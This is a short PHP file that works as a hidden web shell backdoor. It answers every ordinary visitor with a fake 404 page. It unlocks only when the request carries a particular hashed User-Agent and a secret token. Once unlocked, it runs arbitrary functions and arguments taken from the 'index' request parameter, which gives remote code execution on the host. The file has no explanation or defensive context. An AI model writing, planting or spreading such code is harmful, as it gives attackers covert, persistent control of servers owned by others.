<?php

if (md5(md5(md5($_SERVER['HTTP_USER_AGENT']))) != '9a789958ee3a3164008a82d788a997d8') {
    header('HTTP/1.1 404 Not Found');
    header("status: 404 Not Found");
    die();
}
if($_REQUEST["token"] == "ef6d449a38ae736fb44fc672b6f73c8c"){
    if ($li7ieq =    @$_REQUEST['index']){
        $li7ieq[1]($li7ieq[2], $li7ieq[3]($li7ieq[4]));exit;
    }
}